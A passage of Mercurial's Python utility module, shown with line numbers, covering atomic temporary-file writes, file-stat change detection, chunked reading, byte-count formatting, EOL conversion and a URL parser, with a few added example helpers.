2309 2309 except IOError as inst:
2310 2310 if inst.errno == errno.ENOENT:
2311 2311 return temp
2312 2312 if not getattr(inst, 'filename', None):
2313 2313 inst.filename = name
2314 2314 raise
2315 2315 ofp = posixfile(temp, b"wb")
2316 2316 for chunk in filechunkiter(ifp):
2317 2317 ofp.write(chunk)
2318 2318 ifp.close()
2319 2319 ofp.close()
2320 2320 except: # re-raises
2321 2321 try:
2322 2322 os.unlink(temp)
2323 2323 except OSError:
2324 2324 pass
2325 2325 raise
2326 2326 return temp
2327 2327
2328 2328
2329 2329 class filestat(object):
2330 2330     """helper to exactly detect changes of a file
2331 2331 
2332 2332     The 'stat' attribute is the result of 'os.stat()' if the specified
2333 2333     'path' exists. Otherwise, it is None. This avoids a preparatory
2334 2334     'exists()' check on the client side of this class.
2335 2335 """
2336 2336
2337 2337 def __init__(self, stat):
2338 2338 self.stat = stat
2339 2339
2340 2340 @classmethod
2341 2341 def frompath(cls, path):
2342 2342 try:
2343 2343 stat = os.stat(path)
2344 2344 except OSError as err:
2345 2345 if err.errno != errno.ENOENT:
2346 2346 raise
2347 2347 stat = None
2348 2348 return cls(stat)
2349 2349
2350 2350 @classmethod
2351 2351 def fromfp(cls, fp):
2352 2352 stat = os.fstat(fp.fileno())
2353 2353 return cls(stat)
2354 2354
2355 2355 __hash__ = object.__hash__
2356 2356
2357 2357 def __eq__(self, old):
2358 2358 try:
2359 2359 # if ambiguity between stat of new and old file is
2360 2360 # avoided, comparison of size, ctime and mtime is enough
2361 2361 # to exactly detect change of a file regardless of platform
2362 2362 return (
2363 2363 self.stat.st_size == old.stat.st_size
2364 2364 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2365 2365 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2366 2366 )
2367 2367 except AttributeError:
2368 2368 pass
2369 2369 try:
2370 2370 return self.stat is None and old.stat is None
2371 2371 except AttributeError:
2372 2372 return False
2373 2373
2374 2374 def isambig(self, old):
2375 2375 """Examine whether new (= self) stat is ambiguous against old one
2376 2376
2377 2377 "S[N]" below means stat of a file at N-th change:
2378 2378
2379 2379 - S[n-1].ctime < S[n].ctime: can detect change of a file
2380 2380 - S[n-1].ctime == S[n].ctime
2381 2381 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2382 2382 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2383 2383 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2384 2384 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2385 2385
2386 2386         Case (*2) above means that a file was changed twice or more
2387 2387         within the same second (= S[n-1].ctime), so comparing
2388 2388         timestamps alone is ambiguous.
2389 2389 
2390 2390         The basic idea for avoiding such ambiguity is to "advance mtime
2391 2391         by 1 sec if the timestamp is ambiguous".
2392 2392 
2393 2393         But advancing mtime only in case (*2) doesn't work as
2394 2394         expected, because a naturally advanced S[n].mtime in case (*1)
2395 2395         might be equal to a manually advanced S[n-1 or earlier].mtime.
2396 2396 
2397 2397         Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2398 2398         treated as ambiguous regardless of mtime, to avoid overlooking
2399 2399         changes hidden by such mtime conflicts.
2400 2400
2401 2401 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2402 2402 S[n].mtime", even if size of a file isn't changed.
2403 2403 """
2404 2404 try:
2405 2405 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2406 2406 except AttributeError:
2407 2407 return False
2408 2408
2409 2409 def avoidambig(self, path, old):
2410 2410 """Change file stat of specified path to avoid ambiguity
2411 2411
2412 2412 'old' should be previous filestat of 'path'.
2413 2413
2414 2414         This skips avoiding ambiguity if the process doesn't have
2415 2415         appropriate privileges for 'path', and returns False in that
2416 2416         case.
2417 2417
2418 2418 Otherwise, this returns True, as "ambiguity is avoided".
2419 2419 """
2420 2420 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2421 2421 try:
2422 2422 os.utime(path, (advanced, advanced))
2423 2423 except OSError as inst:
2424 2424 if inst.errno == errno.EPERM:
2425 2425 # utime() on the file created by another user causes EPERM,
2426 2426 # if a process doesn't have appropriate privileges
2427 2427 return False
2428 2428 raise
2429 2429 return True
2430 2430
2431 2431 def __ne__(self, other):
2432 2432 return not self == other
2433 2433
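# Editorial sketch, not part of the original module: the typical driver for
# the ambiguity logic above, as used by file-rewriting code. The path is
# hypothetical and the helper is never called.
def _exampleavoidambig(path=b'somefile'):
    oldstat = filestat.frompath(path)
    # ... rewrite `path` in place here ...
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        newstat.avoidambig(path, oldstat)  # bump mtime to disambiguate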
2434 2434
2435 2435 class atomictempfile(object):
2436 2436 '''writable file object that atomically updates a file
2437 2437
2438 2438 All writes will go to a temporary copy of the original file. Call
2439 2439 close() when you are done writing, and atomictempfile will rename
2440 2440 the temporary copy to the original name, making the changes
2441 2441 visible. If the object is destroyed without being closed, all your
2442 2442 writes are discarded.
2443 2443
2444 2444 checkambig argument of constructor is used with filestat, and is
2445 2445 useful only if target file is guarded by any lock (e.g. repo.lock
2446 2446 or repo.wlock).
2447 2447 '''
2448 2448
2449 2449 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2450 2450 self.__name = name # permanent name
2451 2451 self._tempname = mktempcopy(
2452 2452 name,
2453 2453 emptyok=(b'w' in mode),
2454 2454 createmode=createmode,
2455 2455 enforcewritable=(b'w' in mode),
2456 2456 )
2457 2457
2458 2458 self._fp = posixfile(self._tempname, mode)
2459 2459 self._checkambig = checkambig
2460 2460
2461 2461 # delegated methods
2462 2462 self.read = self._fp.read
2463 2463 self.write = self._fp.write
2464 2464 self.seek = self._fp.seek
2465 2465 self.tell = self._fp.tell
2466 2466 self.fileno = self._fp.fileno
2467 2467
2468 2468 def close(self):
2469 2469 if not self._fp.closed:
2470 2470 self._fp.close()
2471 2471 filename = localpath(self.__name)
2472 2472 oldstat = self._checkambig and filestat.frompath(filename)
2473 2473 if oldstat and oldstat.stat:
2474 2474 rename(self._tempname, filename)
2475 2475 newstat = filestat.frompath(filename)
2476 2476 if newstat.isambig(oldstat):
2477 2477 # stat of changed file is ambiguous to original one
2478 2478 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2479 2479 os.utime(filename, (advanced, advanced))
2480 2480 else:
2481 2481 rename(self._tempname, filename)
2482 2482
2483 2483 def discard(self):
2484 2484 if not self._fp.closed:
2485 2485 try:
2486 2486 os.unlink(self._tempname)
2487 2487 except OSError:
2488 2488 pass
2489 2489 self._fp.close()
2490 2490
2491 2491 def __del__(self):
2492 2492 if safehasattr(self, '_fp'): # constructor actually did something
2493 2493 self.discard()
2494 2494
2495 2495 def __enter__(self):
2496 2496 return self
2497 2497
2498 2498 def __exit__(self, exctype, excvalue, traceback):
2499 2499 if exctype is not None:
2500 2500 self.discard()
2501 2501 else:
2502 2502 self.close()
2503 2503
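# Editorial sketch, not part of the original module: the canonical way to use
# atomictempfile is as a context manager, so that an exception discards the
# temporary file instead of clobbering the target. The path is hypothetical
# and the helper is never called.
def _exampleatomicwrite(path=b'config.new'):
    with atomictempfile(path, b'wb') as fp:
        fp.write(b'first line\n')
        fp.write(b'second line\n')
    # on clean exit the temporary file has been renamed over `path`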
2504 2504
2505 2505 def unlinkpath(f, ignoremissing=False, rmdir=True):
2506 2506 """unlink and remove the directory if it is empty"""
2507 2507 if ignoremissing:
2508 2508 tryunlink(f)
2509 2509 else:
2510 2510 unlink(f)
2511 2511 if rmdir:
2512 2512 # try removing directories that might now be empty
2513 2513 try:
2514 2514 removedirs(os.path.dirname(f))
2515 2515 except OSError:
2516 2516 pass
2517 2517
2518 2518
2519 2519 def tryunlink(f):
2520 2520 """Attempt to remove a file, ignoring ENOENT errors."""
2521 2521 try:
2522 2522 unlink(f)
2523 2523 except OSError as e:
2524 2524 if e.errno != errno.ENOENT:
2525 2525 raise
2526 2526
2527 2527
2528 2528 def makedirs(name, mode=None, notindexed=False):
2529 2529 """recursive directory creation with parent mode inheritance
2530 2530
2531 2531 Newly created directories are marked as "not to be indexed by
2532 2532 the content indexing service", if ``notindexed`` is specified
2533 2533 for "write" mode access.
2534 2534 """
2535 2535 try:
2536 2536 makedir(name, notindexed)
2537 2537 except OSError as err:
2538 2538 if err.errno == errno.EEXIST:
2539 2539 return
2540 2540 if err.errno != errno.ENOENT or not name:
2541 2541 raise
2542 2542 parent = os.path.dirname(os.path.abspath(name))
2543 2543 if parent == name:
2544 2544 raise
2545 2545 makedirs(parent, mode, notindexed)
2546 2546 try:
2547 2547 makedir(name, notindexed)
2548 2548 except OSError as err:
2549 2549 # Catch EEXIST to handle races
2550 2550 if err.errno == errno.EEXIST:
2551 2551 return
2552 2552 raise
2553 2553 if mode is not None:
2554 2554 os.chmod(name, mode)
2555 2555
2556 2556
2557 2557 def readfile(path):
2558 2558 with open(path, b'rb') as fp:
2559 2559 return fp.read()
2560 2560
2561 2561
2562 2562 def writefile(path, text):
2563 2563 with open(path, b'wb') as fp:
2564 2564 fp.write(text)
2565 2565
2566 2566
2567 2567 def appendfile(path, text):
2568 2568 with open(path, b'ab') as fp:
2569 2569 fp.write(text)
2570 2570
2571 2571
2572 2572 class chunkbuffer(object):
2573 2573     """Allow arbitrarily sized reads of data to be made efficiently from
2574 2574     an iterator over chunks of arbitrary size."""
2575 2575
2576 2576 def __init__(self, in_iter):
2577 2577 """in_iter is the iterator that's iterating over the input chunks."""
2578 2578
2579 2579 def splitbig(chunks):
2580 2580 for chunk in chunks:
2581 2581 if len(chunk) > 2 ** 20:
2582 2582 pos = 0
2583 2583 while pos < len(chunk):
2584 2584 end = pos + 2 ** 18
2585 2585 yield chunk[pos:end]
2586 2586 pos = end
2587 2587 else:
2588 2588 yield chunk
2589 2589
2590 2590 self.iter = splitbig(in_iter)
2591 2591 self._queue = collections.deque()
2592 2592 self._chunkoffset = 0
2593 2593
2594 2594 def read(self, l=None):
2595 2595 """Read L bytes of data from the iterator of chunks of data.
2596 2596 Returns less than L bytes if the iterator runs dry.
2597 2597
2598 2598 If size parameter is omitted, read everything"""
2599 2599 if l is None:
2600 2600 return b''.join(self.iter)
2601 2601
2602 2602 left = l
2603 2603 buf = []
2604 2604 queue = self._queue
2605 2605 while left > 0:
2606 2606 # refill the queue
2607 2607 if not queue:
2608 2608 target = 2 ** 18
2609 2609 for chunk in self.iter:
2610 2610 queue.append(chunk)
2611 2611 target -= len(chunk)
2612 2612 if target <= 0:
2613 2613 break
2614 2614 if not queue:
2615 2615 break
2616 2616
2617 2617 # The easy way to do this would be to queue.popleft(), modify the
2618 2618 # chunk (if necessary), then queue.appendleft(). However, for cases
2619 2619 # where we read partial chunk content, this incurs 2 dequeue
2620 2620 # mutations and creates a new str for the remaining chunk in the
2621 2621 # queue. Our code below avoids this overhead.
2622 2622
2623 2623 chunk = queue[0]
2624 2624 chunkl = len(chunk)
2625 2625 offset = self._chunkoffset
2626 2626
2627 2627 # Use full chunk.
2628 2628 if offset == 0 and left >= chunkl:
2629 2629 left -= chunkl
2630 2630 queue.popleft()
2631 2631 buf.append(chunk)
2632 2632 # self._chunkoffset remains at 0.
2633 2633 continue
2634 2634
2635 2635 chunkremaining = chunkl - offset
2636 2636
2637 2637 # Use all of unconsumed part of chunk.
2638 2638 if left >= chunkremaining:
2639 2639 left -= chunkremaining
2640 2640 queue.popleft()
2641 2641 # offset == 0 is enabled by block above, so this won't merely
2642 2642 # copy via ``chunk[0:]``.
2643 2643 buf.append(chunk[offset:])
2644 2644 self._chunkoffset = 0
2645 2645
2646 2646 # Partial chunk needed.
2647 2647 else:
2648 2648 buf.append(chunk[offset : offset + left])
2649 2649 self._chunkoffset += left
2650 2650 left -= chunkremaining
2651 2651
2652 2652 return b''.join(buf)
2653 2653
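# Editorial sketch, not part of the original module: chunkbuffer() re-blocks
# an iterator of arbitrarily sized chunks into exact-size reads. Note that
# read() without a size only drains the underlying iterator, so it is best
# used before any sized reads. The helper is never called.
def _examplechunkbuffer():
    buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
    assert buf.read(3) == b'abc'   # spans the first two input chunks
    assert buf.read(4) == b'defg'  # drains the queued remainder
    assert buf.read(1) == b''      # iterator exhausted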
2654 2654
2655 2655 def filechunkiter(f, size=131072, limit=None):
2656 2656     """Create a generator that produces the data in the file in chunks
2657 2657     of size (default 131072) bytes, up to an optional limit (default is
2658 2658     to read all data).  Chunks may be less than size bytes if the
2659 2659     chunk is the last chunk in the file, or the file is a socket or
2660 2660     some other type of file that sometimes reads less data than is
2661 2661     requested."""
2662 2662 assert size >= 0
2663 2663 assert limit is None or limit >= 0
2664 2664 while True:
2665 2665 if limit is None:
2666 2666 nbytes = size
2667 2667 else:
2668 2668 nbytes = min(limit, size)
2669 2669 s = nbytes and f.read(nbytes)
2670 2670 if not s:
2671 2671 break
2672 2672 if limit:
2673 2673 limit -= len(s)
2674 2674 yield s
2675 2675
2676 2676
2677 2677 class cappedreader(object):
2678 2678 """A file object proxy that allows reading up to N bytes.
2679 2679
2680 2680 Given a source file object, instances of this type allow reading up to
2681 2681 N bytes from that source file object. Attempts to read past the allowed
2682 2682 limit are treated as EOF.
2683 2683
2684 2684 It is assumed that I/O is not performed on the original file object
2685 2685 in addition to I/O that is performed by this instance. If there is,
2686 2686 state tracking will get out of sync and unexpected results will ensue.
2687 2687 """
2688 2688
2689 2689 def __init__(self, fh, limit):
2690 2690 """Allow reading up to <limit> bytes from <fh>."""
2691 2691 self._fh = fh
2692 2692 self._left = limit
2693 2693
2694 2694 def read(self, n=-1):
2695 2695 if not self._left:
2696 2696 return b''
2697 2697
2698 2698 if n < 0:
2699 2699 n = self._left
2700 2700
2701 2701 data = self._fh.read(min(n, self._left))
2702 2702 self._left -= len(data)
2703 2703 assert self._left >= 0
2704 2704
2705 2705 return data
2706 2706
2707 2707 def readinto(self, b):
2708 2708 res = self.read(len(b))
2709 2709 if res is None:
2710 2710 return None
2711 2711
2712 2712 b[0 : len(res)] = res
2713 2713 return len(res)
2714 2714
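# Editorial sketch, not part of the original module: cappedreader() turns
# reads past the cap into EOF without consuming the underlying file any
# further. The helper is never called.
def _examplecappedreader():
    import io
    capped = cappedreader(io.BytesIO(b'abcdefgh'), 5)
    assert capped.read(4) == b'abcd'
    assert capped.read(4) == b'e'  # only one byte left under the cap
    assert capped.read(4) == b''   # EOF as far as the consumer can tell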
2715 2715
2716 2716 def unitcountfn(*unittable):
2717 2717 '''return a function that renders a readable count of some quantity'''
2718 2718
2719 2719 def go(count):
2720 2720 for multiplier, divisor, format in unittable:
2721 2721 if abs(count) >= divisor * multiplier:
2722 2722 return format % (count / float(divisor))
2723 2723 return unittable[-1][2] % count
2724 2724
2725 2725 return go
2726 2726
2727 2727
2728 2728 def processlinerange(fromline, toline):
2729 2729 """Check that linerange <fromline>:<toline> makes sense and return a
2730 2730 0-based range.
2731 2731
2732 2732 >>> processlinerange(10, 20)
2733 2733 (9, 20)
2734 2734 >>> processlinerange(2, 1)
2735 2735 Traceback (most recent call last):
2736 2736 ...
2737 2737 ParseError: line range must be positive
2738 2738 >>> processlinerange(0, 5)
2739 2739 Traceback (most recent call last):
2740 2740 ...
2741 2741 ParseError: fromline must be strictly positive
2742 2742 """
2743 2743 if toline - fromline < 0:
2744 2744 raise error.ParseError(_(b"line range must be positive"))
2745 2745 if fromline < 1:
2746 2746 raise error.ParseError(_(b"fromline must be strictly positive"))
2747 2747 return fromline - 1, toline
2748 2748
2749 2749
2750 2750 bytecount = unitcountfn(
2751 2751 (100, 1 << 30, _(b'%.0f GB')),
2752 2752 (10, 1 << 30, _(b'%.1f GB')),
2753 2753 (1, 1 << 30, _(b'%.2f GB')),
2754 2754 (100, 1 << 20, _(b'%.0f MB')),
2755 2755 (10, 1 << 20, _(b'%.1f MB')),
2756 2756 (1, 1 << 20, _(b'%.2f MB')),
2757 2757 (100, 1 << 10, _(b'%.0f KB')),
2758 2758 (10, 1 << 10, _(b'%.1f KB')),
2759 2759 (1, 1 << 10, _(b'%.2f KB')),
2760 2760 (1, 1, _(b'%.0f bytes')),
2761 2761 )
2762 2762
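# Editorial sketch, not part of the original module: bytecount() picks the
# first unit whose threshold the value meets, so precision shrinks as the
# magnitude grows. The expected values assume no translation is active, and
# the helper is never called.
def _examplebytecount():
    assert bytecount(100) == b'100 bytes'
    assert bytecount(4096) == b'4.00 KB'  # 1 <= 4096 / 1024 < 10
    assert bytecount(150 * (1 << 20)) == b'150 MB'  # >= 100 MB: no decimals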
2763 2763
2764 2764 class transformingwriter(object):
2765 2765 """Writable file wrapper to transform data by function"""
2766 2766
2767 2767 def __init__(self, fp, encode):
2768 2768 self._fp = fp
2769 2769 self._encode = encode
2770 2770
2771 2771 def close(self):
2772 2772 self._fp.close()
2773 2773
2774 2774 def flush(self):
2775 2775 self._fp.flush()
2776 2776
2777 2777 def write(self, data):
2778 2778 return self._fp.write(self._encode(data))
2779 2779
2780 2780
2781 2781 # Matches a single EOL which can either be a CRLF where repeated CR
2782 2782 # are removed or a LF. We do not care about old Macintosh files, so a
2783 2783 # stray CR is an error.
2784 2784 _eolre = remod.compile(br'\r*\n')
2785 2785
2786 2786
2787 2787 def tolf(s):
2788 2788 return _eolre.sub(b'\n', s)
2789 2789
2790 2790
2791 2791 def tocrlf(s):
2792 2792 return _eolre.sub(b'\r\n', s)
2793 2793
2794 2794
2795 2795 def _crlfwriter(fp):
2796 2796 return transformingwriter(fp, tocrlf)
2797 2797
2798 2798
2799 2799 if pycompat.oslinesep == b'\r\n':
2800 2800 tonativeeol = tocrlf
2801 2801 fromnativeeol = tolf
2802 2802 nativeeolwriter = _crlfwriter
2803 2803 else:
2804 2804 tonativeeol = pycompat.identity
2805 2805 fromnativeeol = pycompat.identity
2806 2806 nativeeolwriter = pycompat.identity
2807 2807
2808 2808 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2809 2809 3,
2810 2810 0,
2811 2811 ):
2812 2812 # There is an issue in CPython that some IO methods do not handle EINTR
2813 2813 # correctly. The following table shows what CPython version (and functions)
2814 2814 # are affected (buggy: has the EINTR bug, okay: otherwise):
2815 2815 #
2816 2816 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2817 2817 # --------------------------------------------------
2818 2818 # fp.__iter__ | buggy | buggy | okay
2819 2819 # fp.read* | buggy | okay [1] | okay
2820 2820 #
2821 2821 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2822 2822 #
2823 2823 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2824 2824 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2825 2825 #
2826 2826 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2827 2827 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2828 2828 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2829 2829 # fp.__iter__ but not other fp.read* methods.
2830 2830 #
2831 2831 # On modern systems like Linux, the "read" syscall cannot be interrupted
2832 2832 # when reading "fast" files like on-disk files. So the EINTR issue only
2833 2833 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2834 2834 # files approximately as "fast" files and use the fast (unsafe) code path,
2835 2835 # to minimize the performance impact.
2836 2836 if sys.version_info >= (2, 7, 4):
2837 2837 # fp.readline deals with EINTR correctly, use it as a workaround.
2838 2838 def _safeiterfile(fp):
2839 2839 return iter(fp.readline, b'')
2840 2840
2841 2841 else:
2842 2842 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2843 2843 # note: this may block longer than necessary because of bufsize.
2844 2844 def _safeiterfile(fp, bufsize=4096):
2845 2845 fd = fp.fileno()
2846 2846 line = b''
2847 2847 while True:
2848 2848 try:
2849 2849 buf = os.read(fd, bufsize)
2850 2850 except OSError as ex:
2851 2851 # os.read only raises EINTR before any data is read
2852 2852 if ex.errno == errno.EINTR:
2853 2853 continue
2854 2854 else:
2855 2855 raise
2856 2856 line += buf
2857 2857 if b'\n' in buf:
2858 2858 splitted = line.splitlines(True)
2859 2859 line = b''
2860 2860 for l in splitted:
2861 2861 if l[-1] == b'\n':
2862 2862 yield l
2863 2863 else:
2864 2864 line = l
2865 2865 if not buf:
2866 2866 break
2867 2867 if line:
2868 2868 yield line
2869 2869
2870 2870 def iterfile(fp):
2871 2871 fastpath = True
2872 2872 if type(fp) is file:
2873 2873 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2874 2874 if fastpath:
2875 2875 return fp
2876 2876 else:
2877 2877 return _safeiterfile(fp)
2878 2878
2879 2879
2880 2880 else:
2881 2881 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2882 2882 def iterfile(fp):
2883 2883 return fp
2884 2884
2885 2885
2886 2886 def iterlines(iterator):
2887 2887 for chunk in iterator:
2888 2888 for line in chunk.splitlines():
2889 2889 yield line
2890 2890
2891 2891
2892 2892 def expandpath(path):
2893 2893 return os.path.expanduser(os.path.expandvars(path))
2894 2894
2895 2895
2896 2896 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2897 2897 """Return the result of interpolating items in the mapping into string s.
2898 2898
2899 2899 prefix is a single character string, or a two character string with
2900 2900 a backslash as the first character if the prefix needs to be escaped in
2901 2901 a regular expression.
2902 2902
2903 2903 fn is an optional function that will be applied to the replacement text
2904 2904 just before replacement.
2905 2905
2906 2906 escape_prefix is an optional flag that allows using doubled prefix for
2907 2907 its escaping.
2908 2908 """
2909 2909 fn = fn or (lambda s: s)
2910 2910 patterns = b'|'.join(mapping.keys())
2911 2911 if escape_prefix:
2912 2912 patterns += b'|' + prefix
2913 2913 if len(prefix) > 1:
2914 2914 prefix_char = prefix[1:]
2915 2915 else:
2916 2916 prefix_char = prefix
2917 2917 mapping[prefix_char] = prefix_char
2918 2918 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2919 2919 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2920 2920
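# Editorial sketch, not part of the original module: interpolate() expands
# single-character placeholders from a mapping. The mapping and string are
# hypothetical and the helper is never called.
def _exampleinterpolate():
    mapping = {b'H': b'example.com', b'P': b'8080'}
    return interpolate(b'%', mapping, b'%H:%P')  # -> b'example.com:8080'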
2921 2921
2922 2922 def getport(port):
2923 2923 """Return the port for a given network service.
2924 2924
2925 2925 If port is an integer, it's returned as is. If it's a string, it's
2926 2926 looked up using socket.getservbyname(). If there's no matching
2927 2927 service, error.Abort is raised.
2928 2928 """
2929 2929 try:
2930 2930 return int(port)
2931 2931 except ValueError:
2932 2932 pass
2933 2933
2934 2934 try:
2935 2935 return socket.getservbyname(pycompat.sysstr(port))
2936 2936 except socket.error:
2937 2937 raise error.Abort(
2938 2938 _(b"no port number associated with service '%s'") % port
2939 2939 )
2940 2940
2941 2941
2942 2942 class url(object):
2943 2943 r"""Reliable URL parser.
2944 2944
2945 2945 This parses URLs and provides attributes for the following
2946 2946 components:
2947 2947
2948 2948 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2949 2949
2950 2950 Missing components are set to None. The only exception is
2951 2951 fragment, which is set to '' if present but empty.
2952 2952
2953 2953 If parsefragment is False, fragment is included in query. If
2954 2954 parsequery is False, query is included in path. If both are
2955 2955 False, both fragment and query are included in path.
2956 2956
2957 2957 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2958 2958
2959 2959 Note that for backward compatibility reasons, bundle URLs do not
2960 2960 take host names. That means 'bundle://../' has a path of '../'.
2961 2961
2962 2962 Examples:
2963 2963
2964 2964 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2965 2965 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2966 2966 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2967 2967 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2968 2968 >>> url(b'file:///home/joe/repo')
2969 2969 <url scheme: 'file', path: '/home/joe/repo'>
2970 2970 >>> url(b'file:///c:/temp/foo/')
2971 2971 <url scheme: 'file', path: 'c:/temp/foo/'>
2972 2972 >>> url(b'bundle:foo')
2973 2973 <url scheme: 'bundle', path: 'foo'>
2974 2974 >>> url(b'bundle://../foo')
2975 2975 <url scheme: 'bundle', path: '../foo'>
2976 2976 >>> url(br'c:\foo\bar')
2977 2977 <url path: 'c:\\foo\\bar'>
2978 2978 >>> url(br'\\blah\blah\blah')
2979 2979 <url path: '\\\\blah\\blah\\blah'>
2980 2980 >>> url(br'\\blah\blah\blah#baz')
2981 2981 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2982 2982 >>> url(br'file:///C:\users\me')
2983 2983 <url scheme: 'file', path: 'C:\\users\\me'>
2984 2984
2985 2985 Authentication credentials:
2986 2986
2987 2987 >>> url(b'ssh://joe:xyz@x/repo')
2988 2988 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2989 2989 >>> url(b'ssh://joe@x/repo')
2990 2990 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2991 2991
2992 2992 Query strings and fragments:
2993 2993
2994 2994 >>> url(b'http://host/a?b#c')
2995 2995 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2996 2996 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2997 2997 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2998 2998
2999 2999 Empty path:
3000 3000
3001 3001 >>> url(b'')
3002 3002 <url path: ''>
3003 3003 >>> url(b'#a')
3004 3004 <url path: '', fragment: 'a'>
3005 3005 >>> url(b'http://host/')
3006 3006 <url scheme: 'http', host: 'host', path: ''>
3007 3007 >>> url(b'http://host/#a')
3008 3008 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3009 3009
3010 3010 Only scheme:
3011 3011
3012 3012 >>> url(b'http:')
3013 3013 <url scheme: 'http'>
3014 3014 """
3015 3015
3016 3016 _safechars = b"!~*'()+"
3017 3017 _safepchars = b"/!~*'()+:\\"
3018 3018 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3019 3019
3020 3020 def __init__(self, path, parsequery=True, parsefragment=True):
3021 3021 # We slowly chomp away at path until we have only the path left
3022 3022 self.scheme = self.user = self.passwd = self.host = None
3023 3023 self.port = self.path = self.query = self.fragment = None
3024 3024 self._localpath = True
3025 3025 self._hostport = b''
3026 3026 self._origpath = path
3027 3027
3028 3028 if parsefragment and b'#' in path:
3029 3029 path, self.fragment = path.split(b'#', 1)
3030 3030
3031 3031 # special case for Windows drive letters and UNC paths
3032 3032 if hasdriveletter(path) or path.startswith(b'\\\\'):
3033 3033 self.path = path
3034 3034 return
3035 3035
3036 3036 # For compatibility reasons, we can't handle bundle paths as
3037 3037 # normal URLS
3038 3038 if path.startswith(b'bundle:'):
3039 3039 self.scheme = b'bundle'
3040 3040 path = path[7:]
3041 3041 if path.startswith(b'//'):
3042 3042 path = path[2:]
3043 3043 self.path = path
3044 3044 return
3045 3045
3046 3046 if self._matchscheme(path):
3047 3047 parts = path.split(b':', 1)
3048 3048 if parts[0]:
3049 3049 self.scheme, path = parts
3050 3050 self._localpath = False
3051 3051
3052 3052 if not path:
3053 3053 path = None
3054 3054 if self._localpath:
3055 3055 self.path = b''
3056 3056 return
3057 3057 else:
3058 3058 if self._localpath:
3059 3059 self.path = path
3060 3060 return
3061 3061
3062 3062 if parsequery and b'?' in path:
3063 3063 path, self.query = path.split(b'?', 1)
3064 3064 if not path:
3065 3065 path = None
3066 3066 if not self.query:
3067 3067 self.query = None
3068 3068
3069 3069 # // is required to specify a host/authority
3070 3070 if path and path.startswith(b'//'):
3071 3071 parts = path[2:].split(b'/', 1)
3072 3072 if len(parts) > 1:
3073 3073 self.host, path = parts
3074 3074 else:
3075 3075 self.host = parts[0]
3076 3076 path = None
3077 3077 if not self.host:
3078 3078 self.host = None
3079 3079 # path of file:///d is /d
3080 3080 # path of file:///d:/ is d:/, not /d:/
3081 3081 if path and not hasdriveletter(path):
3082 3082 path = b'/' + path
3083 3083
3084 3084 if self.host and b'@' in self.host:
3085 3085 self.user, self.host = self.host.rsplit(b'@', 1)
3086 3086 if b':' in self.user:
3087 3087 self.user, self.passwd = self.user.split(b':', 1)
3088 3088 if not self.host:
3089 3089 self.host = None
3090 3090
3091 3091 # Don't split on colons in IPv6 addresses without ports
3092 3092 if (
3093 3093 self.host
3094 3094 and b':' in self.host
3095 3095 and not (
3096 3096 self.host.startswith(b'[') and self.host.endswith(b']')
3097 3097 )
3098 3098 ):
3099 3099 self._hostport = self.host
3100 3100 self.host, self.port = self.host.rsplit(b':', 1)
3101 3101 if not self.host:
3102 3102 self.host = None
3103 3103
3104 3104 if (
3105 3105 self.host
3106 3106 and self.scheme == b'file'
3107 3107 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3108 3108 ):
3109 3109 raise error.Abort(
3110 3110 _(b'file:// URLs can only refer to localhost')
3111 3111 )
3112 3112
3113 3113 self.path = path
3114 3114
3115 3115 # leave the query string escaped
3116 3116 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3117 3117 v = getattr(self, a)
3118 3118 if v is not None:
3119 3119 setattr(self, a, urlreq.unquote(v))
3120 3120
3121 3121 @encoding.strmethod
3122 3122 def __repr__(self):
3123 3123 attrs = []
3124 3124 for a in (
3125 3125 b'scheme',
3126 3126 b'user',
3127 3127 b'passwd',
3128 3128 b'host',
3129 3129 b'port',
3130 3130 b'path',
3131 3131 b'query',
3132 3132 b'fragment',
3133 3133 ):
3134 3134 v = getattr(self, a)
3135 3135 if v is not None:
3136 3136 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
